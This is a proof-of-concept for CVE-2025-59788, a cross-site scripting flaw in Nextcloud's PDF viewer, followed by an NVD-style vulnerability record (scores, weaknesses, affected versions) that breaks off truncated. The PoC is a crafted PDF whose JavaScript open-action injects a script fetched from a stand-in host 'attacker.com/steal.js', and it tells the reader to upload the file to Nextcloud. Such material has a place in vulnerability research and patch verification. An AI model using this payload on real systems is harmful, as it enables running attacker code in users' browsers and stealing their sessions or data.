CVE-2025-59788

<!-- CVE-2025-59788 PoC: Malicious PDF with embedded JavaScript --> <!-- This PoC demonstrates the XSS vulnerability in Nextcloud files_pdfviewer --> <!-- Save this as malicious.pdf and upload to Nextcloud --> <!-- PDF with JavaScript payload --> %PDF-1.4 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj 2 0 obj << /Type /Pages /Kids [4 0 R] /Count 1 >> endobj 3 0 obj << /Type /Action /S /JavaScript /JS (var script = document.createElement('script'); script.src = 'https://attacker.com/steal.js'; document.head.appendChild(script);) >> endobj 4 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj xref 0 5 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n 0000000214 00000 n trailer << /Size 5 /Root 1 0 R >> startxref 307 %%EOF

{"cve": {"id": "CVE-2025-59788", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:04.380", "lastModified": "2026-03-25T21:35:25.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17", "matchCriteriaId": "8A3D94EC-A877-458D-9A33-5451FE97A785"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "2059C891-F256-482A-99BF-D912A1657419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "32.0.0", "versionEndExcluding": "32.0.1", "matchCriteriaId": "A75D466C-B154-480A-9D4F-8E9454147156"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "22.0.0", "versionEndExcluding": "22.2.10.33", "matchCriteriaId": "4440D2E7-2FCB-4CC2-A57F-708AAB0CD22B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "23.0.0", "versionEndExcluding": "23.0.12.29", "matchCriteriaId": "51922DA7-3112-422A-9F66-9CAA54E89D8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "24.0.0", "versionEndExcluding": "24.0.12.28", "matchCriteriaId": "6AC7C575-7348-45A1-9023-A6606541987B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "25.0.0", "versionEndExcluding": "25.0.13.23", "matchCriteriaId": "000C64D7-C76D-4E69-9705-18132C615456"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "26.0.0", "versionEndExcluding": "26.0.13.20", "matchCriteriaId": "D9491A91-2A7C-4C84-89E9-219422D91350"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "27.0.0", "versionEndExcluding": "27.1.11.20", "matchCriteriaId": "CFD3A15F-58D7-4C3D-A49F-065F28ED6361"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "28.0.0", "versionEndExcluding": "28.0.14.11", "matchCriteriaId": "B55EF258-E98A-43A9-B73C-AE62D448421D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "29.0.0", "versionEndExcluding": "29.0.16.8", "matchCriteriaId": "7710228F-2984-4F9A-8360-0054E7E78687"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17", "matchCriteriaId": "AE19F75F-6A78-4770-B7C6-338570FA7184"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "64C21E45-22B8-49B2 ... (truncated)